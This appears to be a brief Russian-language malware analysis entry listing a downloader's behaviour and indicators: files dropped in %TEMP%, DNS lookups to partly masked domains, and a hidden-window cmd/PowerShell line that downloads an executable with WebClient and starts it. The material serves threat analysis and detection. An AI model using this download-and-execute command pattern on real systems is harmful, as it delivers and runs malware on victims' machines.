Техническая информация
- $ywygqtsyi как %temp%\qlnwx_7.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Bywtlbhoau7([String] $ywygqtsyi){(New-Object System.Net.WebClient).DownloadFile($ywygqtsyi,''%TEMP%\Qlnwx_7.exe'');Start-Process ''%TEMP%\Qlnwx_7.exe'';}tr...
- %TEMP%\rbvcvm.bat
- 'th####ingcel.com':80
- http://th####ingcel.com/kas44.png
- DNS ASK th####ingcel.com
- DNS ASK ev#####psikolojisi.com
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Bywtlbhoau7([String] $ywygqtsyi){(New-Object System.Net.WebClient).DownloadFile($ywygqtsyi,''%TEMP%\Qlnwx_7.exe'');Start-Process ''%TEMP%\Qlnwx_7.exe'';}tr...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\rbvcvm.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\rbvcvm.bat" "